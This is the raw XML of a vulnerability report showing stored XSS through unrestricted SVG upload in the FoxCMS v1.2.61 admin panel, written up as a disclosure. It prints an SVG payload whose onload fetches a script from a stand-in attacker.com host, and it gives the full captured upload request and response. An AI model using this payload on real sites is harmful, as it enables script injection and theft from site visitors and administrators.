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0"/>
        </w:num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Unrestricted SVG Upload Leading to Stored XSS Vulnerability in qianfox/foxcms v1.2.61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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Discoverer: Terry Tian</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Credits: westsec Security Team!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  <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Introduction to Vulnerable Project and Affected Version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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Project Overview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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    Open-source Project: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>qianfox/foxcms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Repository: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://gitee.com/qianfox/foxcms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://gitee.com/qianfox/foxcms" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/qianfox/foxcms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Official Demo/Blog URL: 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"https://www.foxcms.cn/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>https://www.foxcms.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Project Description: "FoxCMS (Qianhu Content Management System) is a high-efficiency cross-platform CMS developed based on PHP+MySQL, designed for multi-terminal content management and digital transformation for enterprises"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Affected Version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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    Version Number: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>v1.2.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Latest stable release)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Release Page: 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"https://gitee.com/qianfox/foxcms.git" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>https://gitee.com/qianfox/foxcms.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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default"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>FoxCMS Installation Prerequisite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ind w:firstLine="42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FoxCMS v1.2.61 requires the source code to be placed in the root directory of the web server (www) for successful installation. Placing the source code in a subdirectory under www will cause a compatibility issue with the installation "Continue" button, making the installation unproceedable. The system is deployed on Apache/2.4.39 + PHP/7.3.4 + MySQL/5.7.26 (WINNT), and the backend access address is http://[Server-IP]/index.php/admin4883/login/index.html.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3714750" cy="2984500"/>
            <wp:effectExtent l="0" t="0" r="635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298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6690" cy="2644140"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1016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4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6690" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="381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6690" cy="2592070"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1143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9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6690" cy="2867025"/>
            <wp:effectExtent l="0" t="0" r="3810" b="317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6690" cy="2765425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="317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6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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Installation completed. Frontend Homepage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://localhost/index.php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6690" cy="2765425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="317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6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Installation completed. Admin Backend: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://localhost/index.php/admin4883/login/index.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://localhost/index.php/admin4883/login/index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>We can check the website system version, and the current version is v1.2.61.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2809240"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1016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0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When accessing via a browser using 127.0.0.1 or localhost, Burp Suite cannot capture the packets; access via the actual IP address is required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,url like this: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"http://192.168.219.183/index.php/admin4883/login/index.html"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4"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://192.168.219.183/index.php/admin4883/login/index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.Vulnerability Proof Process</w:t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XSS - Cross-Site Scripting Attack: Unrestricted Upload of SVG with XSS -&gt; Stored XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Click on Site, then Basic Settings, and click Replace in the URL Icon section to change the icon, as shown in the figure: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1135" cy="2649855"/>
            <wp:effectExtent l="0" t="0" r="12065" b="444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649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66690" cy="2628265"/>
            <wp:effectExtent l="0" t="0" r="3810" b="63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28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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>When replacing the icon, capture the traffic with BurpSuite and intercept the image upload request packet, as shown in the figure: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68595" cy="3199765"/>
            <wp:effectExtent l="0" t="0" r="1905" b="63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199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Change the image file extension (e.g., .png) to the .svg file extension.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SVG files can be uploaded successfully, as shown in the figure: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67325" cy="2872740"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1016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87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Upload the SVG file with the payload embedded in its content; the program fails to filter the payload, leading directly to an XSS vulnerability, as shown in the figure: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 key code for vulnerability verification is as follows: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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;svg xmlns="http://www.w3.org/2000/svg" onload="fetch('hxxp://attacker.com/steal.js')"&gt;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&lt;script&gt;alert(1)&lt;/script&gt;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&lt;/svg&gt;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71770" cy="3101975"/>
            <wp:effectExtent l="0" t="0" r="11430" b="9525"/>
            <wp:docPr id="1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10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The SVG file containing the payload is uploaded successfully, and the payload can be executed by directly accessing the file via a browser:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://192.168.219.183/uploads/files/20260304/d391743ff06f04f1.svg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66690" cy="2452370"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="1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52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Request Packet:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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POST /index.php/admin4883/PicManager/picManager.html HTTP/1.1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Host: 192.168.219.183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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0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Accept: */*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Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5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Accept-Encoding: gzip, deflate, br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X-Requested-With: XMLHttpRequest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Content-Type: multipart/form-data; boundary=----geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Length: 1316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Origin: http://192.168.219.183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Connection: keep-alive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Referer: http://192.168.219.183/index.php/admin4883/Config/base.html?columnId=23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Cookie: PHPSESSID=9b5783b36759e4bfd1e7e522c289e246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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="file[]"; filename="æè·.svg"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Content-Type: image/png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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;svg xmlns="http://www.w3.org/2000/svg" onload="fetch('hxxp://attacker.com/steal.js')"&gt;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&lt;script&gt;alert(1)&lt;/script&gt;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&lt;/svg&gt;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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="file[]"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function item() {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[native code]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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="file[]"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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="pageSize"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10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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="groupId"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-1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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="event"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change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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="handle"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upload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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="type"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local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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc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Content-Disposition: form-data; name="isStamped"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------geckoformboundarye0acd482e95be79ef5c1e37d9eab54bc--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Response Packet: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HTTP/1.1 200 OK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Date: Wed, 04 Mar 2026 07:15:25 GMT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Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02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X-Powered-By: PHP/7.3.4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Access-Control-Allow-Credentials: true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Access-Control-Max-Age: 1800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Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, OPTIONS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Access-Control-Allow-Headers: Authorization, Content-Type, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, X-CSRF-TOKEN, X-Requested-With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Access-Control-Allow-Origin: http://192.168.219.183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Set-Cookie: PHPSESSID=9b5783b36759e4bfd1e7e522c289e246; expires=Thu, 05-Mar-2026 07:15:25 GMT; Max-Age=86400; path=/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Keep-Alive: timeout=5, max=100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Connection: Keep-Alive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Content-Type: application/json; charset=utf-8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Content-Length: 2718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"code":1,"msg":"上传成功","data":{"total":390,"currentPage":1,"pageSize":10,"imgList":[{"storagetext":"本地","id":473,"name":"æè·.svg","url":"\/uploads\/files\/20260304\/d391743ff06f04f1.svg","storage":0,"file_group_type":"0","size":""},{"storagetext":"本地","id":472,"name":"捕获.svg","url":"\/uploads\/files\/20260304\/16d58226b814879d.svg","storage":0,"file_group_type":"0","size":""},{"storagetext":"本地","id":471,"name":"捕获.svg","url":"\/uploads\/files\/20260304\/5a6d68e5f58a6e24.svg","storage":0,"file_group_type":"0","size":""},{"storagetext":"本地","id":470,"name":"捕获.svg","url":"\/uploads\/files\/20260304\/4b398672e998021a.svg","storage":0,"file_group_type":"0","size":""},{"storagetext":"本地","id":469,"name":"捕获.svg","url":"\/uploads\/files\/20260304\/83d843654e776de0.svg","storage":0,"file_group_type":"0","size":"520X389"},{"storagetext":"本地","id":468,"name":"公司外景.jpg","url":"\/\/oss.foxcms.cn\/demo\/files\/20230311\/bf2dc58538506a22.jpg","storage":0,"file_group_type":"5","size":"1000X589"},{"storagetext":"本地","id":467,"name":"内页Banner.jpg","url":"\/uploads\/files\/20230311\/cefc118963cccb9d.jpg","storage":0,"file_group_type":"4","size":"1920X386"},{"storagetext":"本地","id":466,"name":"favicon.png","url":"\/\/oss.foxcms.cn\/demo\/files\/20230311\/776d1e527067fa46.png","storage":0,"file_group_type":"0","size":"100X100"},{"storagetext":"本地","id":461,"name":"在宇宙中闪耀的蓝色明珠，创新与未来的摇篮.jpg","url":"\/\/oss.foxcms.cn\/demo\/files\/20230311\/96566f55a954ecfe.jpg","storage":0,"file_group_type":"7","size":"1107X687"},{"storagetext":"本地","id":460,"name":"无尽的探索与未知的奥秘.jpg","url":"\/\/oss.foxcms.cn\/demo\/files\/20230311\/a2e9472cf88f0669.jpg","storage":0,"file_group_type":"7","size":"1134X645"}],"groupId":"-1","groupList":[{"id":0,"title":"全部","type":"all","count":390,"state":1,"groupId":-1},{"id":32,"title":"默认分组","type":"system","count":9,"state":0,"groupId":0},{"id":33,"title":"本地图片","type":"system","count":390,"state":0,"groupId":1},{"id":34,"title":"OSS图片","type":"system","count":0,"state":0,"groupId":2},{"id":100,"title":"产品图片","type":"custom","count":193,"state":0,"groupId":3},{"id":101,"title":"广告图片","type":"custom","count":3,"state":0,"groupId":4},{"id":106,"title":"关于我们","type":"custom","count":39,"state":0,"groupId":5},{"id":107,"title":"新闻资讯","type":"custom","count":26,"state":0,"groupId":6},{"id":108,"title":"案例展示","type":"custom","count":120,"state":0,"groupId":7}],"type":"local","handle":"upload","startDate":"","endDate":"","extractedUrl":"","isStamped":0},"url":"","wait":1}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altName w:val="汉仪书宋二KW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Webdings">
    <w:panose1 w:val="05030102010509060703"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="8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onospace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altName w:val="苹方-简"/>
    <w:panose1 w:val="02000600000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="2000009F" w:csb1="47010000"/>
  </w:font>
  <w:font w:name="unse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93D2B01"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="693D2B01"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing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4354C9E"/>
    <w:rsid w:val="00BC0C4A"/>
    <w:rsid w:val="019A0A60"/>
    <w:rsid w:val="01CE122C"/>
    <w:rsid w:val="04354C9E"/>
    <w:rsid w:val="05342172"/>
    <w:rsid w:val="05A827D0"/>
    <w:rsid w:val="06BC5692"/>
    <w:rsid w:val="078629A9"/>
    <w:rsid w:val="07D80E2E"/>
    <w:rsid w:val="089E0073"/>
    <w:rsid w:val="09781ADD"/>
    <w:rsid w:val="0A2B1FDE"/>
    <w:rsid w:val="0E326F0A"/>
    <w:rsid w:val="11864195"/>
    <w:rsid w:val="14AE6A0A"/>
    <w:rsid w:val="14FE25B8"/>
    <w:rsid w:val="173C6FE6"/>
    <w:rsid w:val="189F6417"/>
    <w:rsid w:val="1BAB1F30"/>
    <w:rsid w:val="1C702640"/>
    <w:rsid w:val="1DD42FD5"/>
    <w:rsid w:val="1F3B7622"/>
    <w:rsid w:val="1F88690C"/>
    <w:rsid w:val="20236873"/>
    <w:rsid w:val="213F4BD4"/>
    <w:rsid w:val="232A254A"/>
    <w:rsid w:val="24EB0DEB"/>
    <w:rsid w:val="268C1212"/>
    <w:rsid w:val="27A76DA8"/>
    <w:rsid w:val="28FC4953"/>
    <w:rsid w:val="290C141A"/>
    <w:rsid w:val="29C92007"/>
    <w:rsid w:val="2A2F5719"/>
    <w:rsid w:val="2A607198"/>
    <w:rsid w:val="2AF27085"/>
    <w:rsid w:val="2C8A760C"/>
    <w:rsid w:val="2E3D3592"/>
    <w:rsid w:val="2FD1261F"/>
    <w:rsid w:val="32A35F93"/>
    <w:rsid w:val="3468431F"/>
    <w:rsid w:val="351F00D4"/>
    <w:rsid w:val="370F17D2"/>
    <w:rsid w:val="37294921"/>
    <w:rsid w:val="376644E8"/>
    <w:rsid w:val="37836E32"/>
    <w:rsid w:val="37ED17CB"/>
    <w:rsid w:val="38CE5283"/>
    <w:rsid w:val="3A0F6CBE"/>
    <w:rsid w:val="3B0B359B"/>
    <w:rsid w:val="3B415CF2"/>
    <w:rsid w:val="3B6623EC"/>
    <w:rsid w:val="3C733A6C"/>
    <w:rsid w:val="3D4A3577"/>
    <w:rsid w:val="3D821EF9"/>
    <w:rsid w:val="3F777E08"/>
    <w:rsid w:val="401324AB"/>
    <w:rsid w:val="408B2E5A"/>
    <w:rsid w:val="411D4ADC"/>
    <w:rsid w:val="43546B41"/>
    <w:rsid w:val="43AB0CC4"/>
    <w:rsid w:val="44A90AC0"/>
    <w:rsid w:val="44AC24C9"/>
    <w:rsid w:val="45273B5C"/>
    <w:rsid w:val="453E4F19"/>
    <w:rsid w:val="45EC12D2"/>
    <w:rsid w:val="47584749"/>
    <w:rsid w:val="48191655"/>
    <w:rsid w:val="49657EF1"/>
    <w:rsid w:val="49F87DF4"/>
    <w:rsid w:val="4A034850"/>
    <w:rsid w:val="4B2804A9"/>
    <w:rsid w:val="4BB918CA"/>
    <w:rsid w:val="4C8079D2"/>
    <w:rsid w:val="4FB55E1E"/>
    <w:rsid w:val="50F16AF8"/>
    <w:rsid w:val="50F5604A"/>
    <w:rsid w:val="525069D9"/>
    <w:rsid w:val="5262727B"/>
    <w:rsid w:val="538B4F6C"/>
    <w:rsid w:val="53A531E4"/>
    <w:rsid w:val="53DFC72C"/>
    <w:rsid w:val="544A184B"/>
    <w:rsid w:val="566B611E"/>
    <w:rsid w:val="570908A3"/>
    <w:rsid w:val="58195845"/>
    <w:rsid w:val="59155D6F"/>
    <w:rsid w:val="592E6575"/>
    <w:rsid w:val="595240FF"/>
    <w:rsid w:val="597A1984"/>
    <w:rsid w:val="5ADF8A1C"/>
    <w:rsid w:val="5B1E6BAC"/>
    <w:rsid w:val="5C0419E6"/>
    <w:rsid w:val="5EA27232"/>
    <w:rsid w:val="5FA92078"/>
    <w:rsid w:val="611D3558"/>
    <w:rsid w:val="620F0072"/>
    <w:rsid w:val="625913C7"/>
    <w:rsid w:val="634A0A9C"/>
    <w:rsid w:val="63795348"/>
    <w:rsid w:val="654064E1"/>
    <w:rsid w:val="65406745"/>
    <w:rsid w:val="66B62D90"/>
    <w:rsid w:val="66D148A2"/>
    <w:rsid w:val="67766A2E"/>
    <w:rsid w:val="67FFDBCC"/>
    <w:rsid w:val="68AA7998"/>
    <w:rsid w:val="6B5E51BE"/>
    <w:rsid w:val="6B8714CD"/>
    <w:rsid w:val="6D013438"/>
    <w:rsid w:val="6E1110FC"/>
    <w:rsid w:val="6F5E3ED5"/>
    <w:rsid w:val="724A623C"/>
    <w:rsid w:val="74CF61D4"/>
    <w:rsid w:val="75AA1341"/>
    <w:rsid w:val="766F0AD9"/>
    <w:rsid w:val="76AC3660"/>
    <w:rsid w:val="76D866E3"/>
    <w:rsid w:val="79CA6A10"/>
    <w:rsid w:val="7B5169E1"/>
    <w:rsid w:val="7BBD2FB4"/>
    <w:rsid w:val="7BD58617"/>
    <w:rsid w:val="7C906665"/>
    <w:rsid w:val="7D3A1D73"/>
    <w:rsid w:val="7DAB7991"/>
    <w:rsid w:val="7EF70AD5"/>
    <w:rsid w:val="7FA11EA9"/>
    <w:rsid w:val="7FA694D2"/>
    <w:rsid w:val="7FE61E58"/>
    <w:rsid w:val="7FEF0119"/>
    <w:rsid w:val="8CF7F51A"/>
    <w:rsid w:val="A77FEE15"/>
    <w:rsid w:val="BFF7DC81"/>
    <w:rsid w:val="C9D7C658"/>
    <w:rsid w:val="CFFC127D"/>
    <w:rsid w:val="D7FB2485"/>
    <w:rsid w:val="F9EFAFCD"/>
    <w:rsid w:val="FBDD1E91"/>
    <w:rsid w:val="FBF901D7"/>
    <w:rsid w:val="FF7D7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3">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="5">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="2"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans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customXml" Target="../customXml/item1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Office_1.1.0.1454_F1E327BC-269C-435d-A152-05C5408002CA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2026-03-05T10:21:00Z</dcterms:created>
  <dc:creator>ccbft-cd01</dc:creator>
  <cp:lastModifiedBy>hack</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-04T22:31:59Z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2052-1.1.0.1454</vt:lpwstr>
  </property>
